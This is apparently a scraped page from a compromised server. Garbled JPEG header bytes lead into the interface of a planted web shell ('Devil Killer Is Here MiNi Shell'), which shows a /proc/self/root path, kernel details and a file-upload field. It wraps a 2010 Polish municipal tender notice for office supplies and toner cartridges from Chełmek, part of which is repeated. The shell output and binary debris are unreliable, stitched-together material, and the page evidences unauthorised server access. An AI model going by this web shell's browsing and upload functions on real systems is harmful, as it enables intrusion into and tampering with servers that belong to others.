JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100122/19476-N-2010.html

<p class="kh_header"><b>Chełmek: Dostawa materiałów biurowych i eksploatacyjnych dla Urzędu Miejskiego w Chełmku w 2010</b><br>
<b>Numer ogłoszenia: 19476 - 2010; data zamieszczenia: 22.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chełmek , ul. Krakowska 11, 32-660 Chełmek, woj. małopolskie, tel. 033 8449040, 8449000, faks 033 8449019.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i eksploatacyjnych dla Urzędu Miejskiego w Chełmku w 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część VII. Określenie przedmiotu zamówienia: (dostawy).
1. Przedmiotem zamówienia są dostawy materiałów biurowych i eksploatacyjnych do Urzędu Miejskiego w Chełmku  do 31 grudnia 2010 r. 
2. Lista materiałów i ich ilości podane dla części /A/ i /B/ będą brane pod uwagę tylko dla porównania i oceny złożonych ofert. Zamówienie będzie realizowane w formie zlecenia do wartości środków jaką zamawiający posiada w budżecie (oddzielnie dla części /A/ i /B/ ).
3. Realizacja każdego zlecenia częściowego nastąpi  w terminie 3 dni od terminu zgłoszenia.
4. Wykonawca składający ofertę zobowiązany jest do jednoznacznego określenia zaoferowanych produktów, charakteryzując je poprzez wskazanie np.: na konkretny wybór, nazwanie określenie marki, znaku towarowego lub innych przypisanych wyłącznie temu produktowi cech, również w przypadku składania oferty równoważnej.
5. Wykonawca składając ofertę równoważną musi wykazać w treści składanej oferty, że oferowany towar spełnia wymagania i parametry techniczne określone przez Zamawiającego.

Część VII A Dostawa materiałów biurowych:
1. Papier uniwersalny nadający się do drukarek, faksów i kserokopiarek (klasy Polspeed):
a) Format A3 w ryzach tj. 500 szt. o gramaturze min. 80 g/m2, i białości min. 146 według skali białości CIE, lub lepszy  - za 1 ryzę,
b) Format A4 w ryzach tj. 500 szt. o gramaturze  min.  80 g/m2 i białości min. 146 według skali białości CIE  - za 1 ryzę,
c) Papier do kolorowych drukarek laserowych, A4 w ryzach tj. 250 szt. o gramaturze min. 250 g/m2 , biały  - za 1 ryzę,
2. Koszulki przeźroczyste A4 w  opakowaniu 100 sztuk  - za 1 opakowanie,
3. Koszulki przeźroczyste A5  w opakowanie 100 sztuk  - za 1 opakowanie,
4. Koperty:
- białe samoklejące C 6 w opakowaniu 500 sztuk  - za 1 opakowanie,
- białe samoklejące C5 w  opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące B5 w opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące C4 w opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące B4 w opakowaniu 50 sztuk  - za 1 opakowanie,
- brązowe E4 poszerzone boki i spód w opakowaniu 50 sztuk  - za 1 opakowanie,
- z folią bombelkową C4, B4, C5 po z każdego typu  - za 1 sztukę,
5. Segregator (klasy /Esselte/ ) oklejony na zewnątrz i wewnątrz poliolefiną , różne kolory:
a) A4/50mm  - za 1 sztukę,
b) A4/75mm  - za 1 sztukę,
c) A4/80mm  - za 1sztukę,
7. Teczki biurowe: wiązane białe papierowe A4 - za 1 sztukę,
8. Skoroszyt kartonowy, zawieszka, oczkowy - za 1 sztukę,
9. Skoroszyty plastikowe : 
a) twarde uniwersalne - za 1 sztukę,
b) twarde wpinane - za 1 sztukę,
c) miękkie uniwersalne - za 1 sztukę,
d) miękkie twarde wpinane  - za 1 sztukę,
10. Obwoluty typu L , format A4 w opakowaniu 25 sztuk  - za 1 opakowanie,
11. Obwoluty typu L , format A5 w opakowaniu 25 sztuk  - za 1 opakowanie,
12. Kostka kolorowa  nie klejona o wymiarach 8,5x8,5x4 cm.  - za 1 sztukę,
13. Karteczki samoprzylepne, żółte o rozmiarach  - za 1 sztukę,
- 38-51 mm 
- 76-127 mm
- 76-102 mm
- 51-76 mm
- 76-76 mm
14. Teczka z gumką wykonana z mocnego kartonu, barwionego i lakierowanego z jednej strony (różne kolory)  - za 1 sztukę,
15. Klip metalowy w opakowaniu 12 sztuk  - za 1 opakowanie,
a) 25 mm,
b)32 mm,
c) 41 mm,
d) 51mm;
16. Taśma samoklejąca, przezroczysta bezbarwna -18mm x10m  - za 1 sztukę,
17. Taśma ( typu i klasy Scotch Magic - zielona) w pudełku 19mm x 33m  - za 1 sztukę,
18. Klej (klasy AMOS) opakowanie 15g - za 1 sztukę,
19. Korektor w piórze szybkoschnący   - za 1 sztukę,
20. Korektor w  taśmie   - za 1 sztukę,
21. Długopis (klasy i typu Zenit 7), wkład w kolorze czarnym i niebieskim  - za 1 sztukę,
22. Cienkopisy  (klasy Stabilo) czarne, czerwone, niebieskie  - za 1 sztukę,
23. Marker pernamentny, czarny ze ścięta końcówką  - za 1 sztukę,
24. Zakreślacz różne kolory (klasy Donau lub Stabilo Boss lub Pelikan)  - za 1 sztukę,
25. Ołówek  HB z gumką  - za 1 sztukę,
26. Blok biurowy w kratkę, min. 50 kartek  - za 1 sztukę,
- A4
- A5
27. Spinacze o wysokiej jakości metalu:
a) trójkątne rozmiar 25mm 100 sztuk w opakowaniu  - za 1 opakowanie,
b) okrągłe rozmiar 33 mm 100 sztuk w opakowaniu  - za 1 opakowanie,
c) okrągłe rozmiar 50 mm 100 sztuk w opakowaniu  - za 1 opakowanie,
28. Zszywki 1000 sztuk w opakowaniu  - za 1 opakowanie,
a) rozmiar - 24/6;
b) rozmiar - 24/6-8;
29. Przekładki kolorowe do segregatora, dziurkowane:2, format  240 x105 mm, różne kolory. - 100 sztuk w opakowaniu  - za 1 opakowanie,
30. Pasek skoroszytowy do segregatora 10 sztuk w opakowaniu  - za 1 sztukę
31. Koszulki /obwoluty na dokumenty z klapką - otwierane z boku 10 sztuk w opakowaniu  - za 1 sztukę,
32. Brulion A4, 96 kartkowy, gruba okładka  - za 1 sztukę,
33.Zeszyt A4 w kratkę, 60 stron  - za 1 sztukę,
34.Zeszyt A3 w kratkę, 60 stron  - za 1 sztukę,
35. Zakładki indeksujące przezroczyste wąskie 4 kolory wymiary 12x43 min- 100 szt w opakowaniu,
36. Tablica korkowa o wymiarach 60x40 cm  - za 1 sztukę,
37. Tablica korkowa o wymiarach 90x60 cm  - za 1 sztukę,
38. Pinezki tablicowe ( do tablic korkowych ) minimum 50 szt. w opakowaniu.-   za 1 opakowanie
39. Mechanizm skoroszytowy z metalowa blaszką, 4 dziurki - wąsy wykonane z ekologicznego PP pakowane po min. 25 szt. -  za 1 opakowanie.
40. Holdery z taśmą - (identyfikator osobisty) -  - za 1 sztukę,
41. Identyfikator wyposażony w samozaciskowy klips i agrafkę -  - za 1 sztukę,
42. Naboje do pióra wiecznego - Parker  z dużym zasobnikiem  - za 1 opakowanie,
43. Naboje do pióra wiecznego - Waterman   - za 1 opakowanie,
44. Klej w płynie z pędzelkiem , pojemność min. 50 ml   - za 1 sztukę,
45. Nożyczki biurowe wymiar 16 cm.  - za 1 sztukę,
46. Kredki pastelowe, drewniane o miękkim wkładzie 12 kolorowe - za 1 opakowanie,
47. Pojemnik na czasopisma wykonany z plastiku o wymiarach 210x320x255 mm - za 1 sztukę
48. Pisaki, różne kolorowy ścięta końcówka, grubość linii pisania minimum 2mm - za 1 opakowanie,
49. Pisak kreślarski grubość linii pisania 0,05 mm średnicy  - za 1 sztukę,
50. Spinacz archiwizacyjny biały plastikowy przeznaczony do błyskawicznego spinania dokumentów 50 sztuk w opakowaniu - za 1 opakowanie,
51.Temperówka z pojemnikiem  - za 1 sztukę,
52. Gumka do mazania - za 1 sztukę,
           53. Półki na dokumenty z plastiku  do formacie A4  - za 1 sztukę,
 	54.Papier kolorowy pastelowy 80G/m2 ryza 500 arkuszy  - za 1 ryzę,
           55.Papier kolorowy błyszczący szkolny - za 1 sztukę,
56.Bristol o wymiarach ok. 2mx2m   - za 1 sztukę
57. Pojemnik metalowy na spinacze - za 1 sztukę,
58. Kartoteka obrotowa na 500 kart wizytowych, metalowa - za 1 sztukę,
59. Wizytownik na 200 szt. wizytówek - za 1 sztukę.

Część VII B Dostawa materiałów eksploatacyjnych do wyceny ( za  1 szt.):

1.Kaseta z tonerem do kserokopiarki 
a) Toshiba 2060.
b) Toshiba 1350 E
2.Kaseta z tonerem do kserokopiarki - Sharp AR - M 160.
3.Kaseta z tonerem o symbolu 15 A do drukarki HP Laser Jet 1200. 
4.Kaseta z tonerem o symbolu13 A do drukarki HP Laser Jet 1300. 
5.Kaseta z tonerem o symbolu 12 A do drukarki HP Laser Jet 1010.
6.Kaseta z tonerem o symbolu 06 A do drukarki HP Laser Jet 6L. 
7.Kaseta z tonerem o symbolu 49 A do drukarki HP Laser Jet 1320.
8.Kaseta z tonerem o symbolu 36A do drukarki HP M1120
9.Kaseta z tuszem do drukarki HP Desk Jet- 1220 c.
a) tusz czarny o symbolu 45.
b) tusz kolorowy o symbolu 78.
10.Kaseta z tonerem do drukarki HP Laser Jet 1600 o symbolu:
a) Q6000A
b) Q6001A
c) Q6002A
d) Q6003A
11.Kaseta z tonerem o symbolu 92 A do drukarki HP Laser Jet 1100.
12.Kaseta z tonerem do drukarki Phaser 3435 XEROX 106R 01414 (D4)
13.Kaseta z tonerem o symbolu CB540 A
14.Kaseta z tonerem o symbolu CB541 A
15.Kaseta z tonerem o symbolu CB542 A
16.Kaseta z tonerem o symbolu CB443 A
17.Toner do kserokopiarki TOSHIBA 1340 o symbolu T-1350E
18.Toner do urządzenia wielofunkcyjnego XEROX WorkCentre 5016
19.tusz czarny o symbolu 338
20.tusz kolorowy o symbolu 343
21.Płyta CD  (klasy Verbatim) 700 MB (w kopertach - każda płyta musi być pakowana osobno, dopuszcza się pakowane w szpuli + koperta do każdej płyty).
22.Płyta DVD+R, (klasy Verbatim) (w kopertach - każda płyta musi być pakowana osobno,dopuszcza się pakowane w szpuli + koperta do każdej płyty).

1. W przypadku składania ofert na materiały eksploatacyjne Zamawiający wymaga aby zaoferowane materiały były: oryginalne, nieregenerowane, nieposiadające elementów z recyklingu.
2. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, Zamawiający zastrzega, aby produkty zamienne(wszystkie komponenty użyte do produkcji np. Tonerów równoważnych) były wyprodukowane przez danego producenta od podstaw a oferowane zamienniki posiadały wszystkie funkcje materiałów oryginalnych, np.  poziom tuszu.
3. W przypadku złożenia oferty równoważnej na materiały eksploatacyjne Wykonawca ma obowiązek dołączenia do oferty:
a) Oświadczenie Wykonawcy, że zaoferowane materiały eksploatacyjne są oryginalne, nieregenerowane i nie posiadają elementów z recyklingu. Oświadczenie musi zawierać zobowiązanie Wykonawcy do naprawy urządzenia w przypadku awarii spowodowanej zastosowaniem materiałów dostarczonych przez Wykonawcę.
b) deklaracji zgodności ( w języku polskim)  producenta materiałów równoważnych lub jego upoważnionego przedstawiciela na produkt równoważny stwierdzającej, że wyrób jest zgodny z zasadami i wymaganiami w rozumieniu art. 5 ust 16 ustawy z dnia 30 sierpnia 2002 o systemie oceny zgodności, Dz. U. Nr 204, poz. 2087 z 2004 r., tj. należy przez to rozumieć wymagania, które powinien spełniać wyrób wprowadzony do obrotu, określone w dyrektywach nowego podejścia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.12.51.10-5, 30.19.76.20-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy złożą ważną i odpowiednią ofertę.
2. Oferta ważna spełniać musi następujące warunki:
a) Wykonawca składający ofertę nie może być wykluczony z postępowania na podstawie art. 24 Prawa zamówień publicznych, jak również musi spełniać warunki art. 22 ust. 1 pkt. 1-3 Prawa zamówień publicznych.
b) oferta winna być sporządzona na piśmie w języku polskim,
c) oferta winna być złożona w terminie wyznaczonym przez Zamawiającego, 
3. Oferta winna być zgodna w kwestii sposobu jej sporządzania, oferowanego przedmiotu i warunków realizacji zamówienia ze wszystkimi wymogami specyfikacji istotnych warunków zamówienia jak i ustawą Prawo zamówień publicznych. Zamawiający dokona sprawdzenia ofert - zgodności ze specyfikacją jak i ustawą Prawo zamówień publicznych metodą spełnia /nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące dokumenty:
/ dokumenty potwierdzające ważność ofert/
a) oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych;
b) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
c) oświadczenie Wykonawcy w trybie art. 22 ust. 1 pkt.1-3 ustawy Prawo zamówień publicznych,	
d) oświadczenie Wykonawcy o zapoznaniu się ze specyfikacją istotnych warunków zamówienia
i przyjęciu warunków w niej zawartych,
e) aktualne zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego  oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 	płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
(wspólnicy spółki cywilnej składają wymagane dokumenty na spółkę jak i na wspólników spółki),
f) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty wystawione zgodnie z prawem tego kraju potwierdzające , że jest:
uprawniony do występowania w obrocie prawnym
nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienia odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie (dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
(Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt /4f/ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu  zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania). 
W przypadku złożenia oferty przez podmioty występujące wspólnie, wyszczególnione w części VI 4 a-f specyfikacji, warunki oraz dokumenty uwiarygadniające dotyczą wszystkich występujących w ofercie podmiotów.
g) w przypadku podmiotów występujących wspólnie określenie zakresu dostaw                           poszczególnych podmiotów lub jednostek organizacyjnych,
h) kalkulację cenową (zgodnie z  tabelą wyceny za poszczególne materiały).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chelmek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Krakowska 11, 32-660 Chełmek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2010 godzina 10:00, miejsce: Urząd Miejski, ul. Krakowska 11, 32-660 Chełmek.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część VII A Dostawa materiałów biurowych:.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy materiałów biurowych i eksploatacyjnych do Urzędu Miejskiego w Chełmku  do 31 grudnia 2010 r. 
2. Lista materiałów i ich ilości podane dla części A i B będą brane pod uwagę tylko dla porównania i oceny złożonych ofert. Zamówienie będzie realizowane w formie zlecenia do wartości środków jaką zamawiający posiada w budżecie (oddzielnie dla części A i B).
3. Realizacja każdego zlecenia częściowego nastąpi  w terminie 3 dni od terminu zgłoszenia.
4. Wykonawca składający ofertę zobowiązany jest do jednoznacznego określenia zaoferowanych produktów, charakteryzując je poprzez wskazanie np.: na konkretny wybór, nazwanie określenie marki, znaku towarowego lub innych przypisanych wyłącznie temu produktowi cech, również w przypadku składania oferty równoważnej.
5. Wykonawca składając ofertę równoważną musi wykazać w treści składanej oferty, że oferowany towar spełnia wymagania i parametry techniczne określone przez Zamawiającego.

Część VII A Dostawa materiałów biurowych:
1. Papier uniwersalny nadający się do drukarek, faksów i kserokopiarek (klasy Polspeed):
a) Format A3 w ryzach tj. 500 szt. o gramaturze min. 80 g/m2, i białości min. 146 według skali białości CIE, lub lepszy  - za 1 ryzę,
b) Format A4 w ryzach tj. 500 szt. o gramaturze  min.  80 g/m2 i białości min. 146 według skali białości CIE  - za 1 ryzę,
c) Papier do kolorowych drukarek laserowych, A4 w ryzach tj. 250 szt. o gramaturze min. 250 g/m2 , biały  - za 1 ryzę,
2. Koszulki przeźroczyste A4 w  opakowaniu 100 sztuk  - za 1 opakowanie,
3. Koszulki przeźroczyste A5  w opakowanie 100 sztuk  - za 1 opakowanie,
4. Koperty:
- białe samoklejące C 6 w opakowaniu 500 sztuk  - za 1 opakowanie,
- białe samoklejące C5 w  opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące B5 w opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące C4 w opakowaniu 50 sztuk  - za 1 opakowanie,
- białe samoklejące B4 w opakowaniu 50 sztuk  - za 1 opakowanie,
- brązowe E4 poszerzone boki i spód w opakowaniu 50 sztuk  - za 1 opakowanie,
- z folią bombelkową C4, B4, C5 po z każdego typu  - za 1 sztukę,
5. Segregator (klasy Esselte ) oklejony na zewnątrz i wewnątrz poliolefiną , różne kolory:
a) A4/50mm  - za 1 sztukę,
b) A4/75mm  - za 1 sztukę,
c) A4/80mm  - za 1sztukę,
7. Teczki biurowe: wiązane białe papierowe A4 - za 1 sztukę,
8. Skoroszyt kartonowy, zawieszka, oczkowy - za 1 sztukę,
9. Skoroszyty plastikowe : 
a) twarde uniwersalne - za 1 sztukę,
b) twarde wpinane - za 1 sztukę,
c) miękkie uniwersalne - za 1 sztukę,
d) miękkie twarde wpinane  - za 1 sztukę,
10. Obwoluty typu L , format A4 w opakowaniu 25 sztuk  - za 1 opakowanie,
11. Obwoluty typu L , format A5 w opakowaniu 25 sztuk  - za 1 opakowanie,
12. Kostka kolorowa  nie klejona o wymiarach 8,5x8,5x4 cm.  - za 1 sztukę,
13. Karteczki samoprzylepne, żółte o rozmiarach  - za 1 sztukę,
- 38-51 mm 
- 76-127 mm
- 76-102 mm
- 51-76 mm
- 76-76 mm
14. Teczka z gumką wykonana z mocnego kartonu, barwionego i lakierowanego z jednej strony (różne kolory)  - za 1 sztukę,
15. Klip metalowy w opakowaniu 12 sztuk  - za 1 opakowanie,
a) 25 mm,
b)32 mm,
c) 41 mm,
d) 51mm;
16. Taśma samoklejąca, przezroczysta bezbarwna -18mm x10m  - za 1 sztukę,
17. Taśma ( typu i klasy Scotch Magic - zielona) w pudełku 19mm x 33m  - za 1 sztukę,
18. Klej (klasy AMOS) opakowanie 15g - za 1 sztukę,
19. Korektor w piórze szybkoschnący   - za 1 sztukę,
20. Korektor w  taśmie   - za 1 sztukę,
21. Długopis (klasy i typu Zenit 7), wkład w kolorze czarnym i niebieskim  - za 1 sztukę,
22. Cienkopisy  (klasy Stabilo) czarne, czerwone, niebieskie  - za 1 sztukę,
23. Marker pernamentny, czarny ze ścięta końcówką  - za 1 sztukę,
24. Zakreślacz różne kolory (klasy Donau lub Stabilo Boss lub Pelikan)  - za 1 sztukę,
25. Ołówek  HB z gumką  - za 1 sztukę,
26. Blok biurowy w kratkę, min. 50 kartek  - za 1 sztukę,
- A4
- A5
27. Spinacze o wysokiej jakości metalu:
a) trójkątne rozmiar 25mm 100 sztuk w opakowaniu  - za 1 opakowanie,
b) okrągłe rozmiar 33 mm 100 sztuk w opakowaniu  - za 1 opakowanie,
c) okrągłe rozmiar 50 mm 100 sztuk w opakowaniu  - za 1 opakowanie,
28. Zszywki 1000 sztuk w opakowaniu  - za 1 opakowanie,
a) rozmiar - 24/6;
b) rozmiar - 24/6-8;
29. Przekładki kolorowe do segregatora, dziurkowane:2, format  240 x105 mm, różne kolory. - 100 sztuk w opakowaniu  - za 1 opakowanie,
30. Pasek skoroszytowy do segregatora 10 sztuk w opakowaniu  - za 1 sztukę
31. Koszulki /obwoluty na dokumenty z klapką - otwierane z boku 10 sztuk w opakowaniu  - za 1 sztukę,
32. Brulion A4, 96 kartkowy, gruba okładka  - za 1 sztukę,
33.Zeszyt A4 w kratkę, 60 stron  - za 1 sztukę,
34.Zeszyt A3 w kratkę, 60 stron  - za 1 sztukę,
35. Zakładki indeksujące przezroczyste wąskie 4 kolory wymiary 12x43 min- 100 szt w opakowaniu,
36. Tablica korkowa o wymiarach 60x40 cm  - za 1 sztukę,
37. Tablica korkowa o wymiarach 90x60 cm  - za 1 sztukę,
38. Pinezki tablicowe ( do tablic korkowych ) minimum 50 szt. w opakowaniu.-   za 1 opakowanie
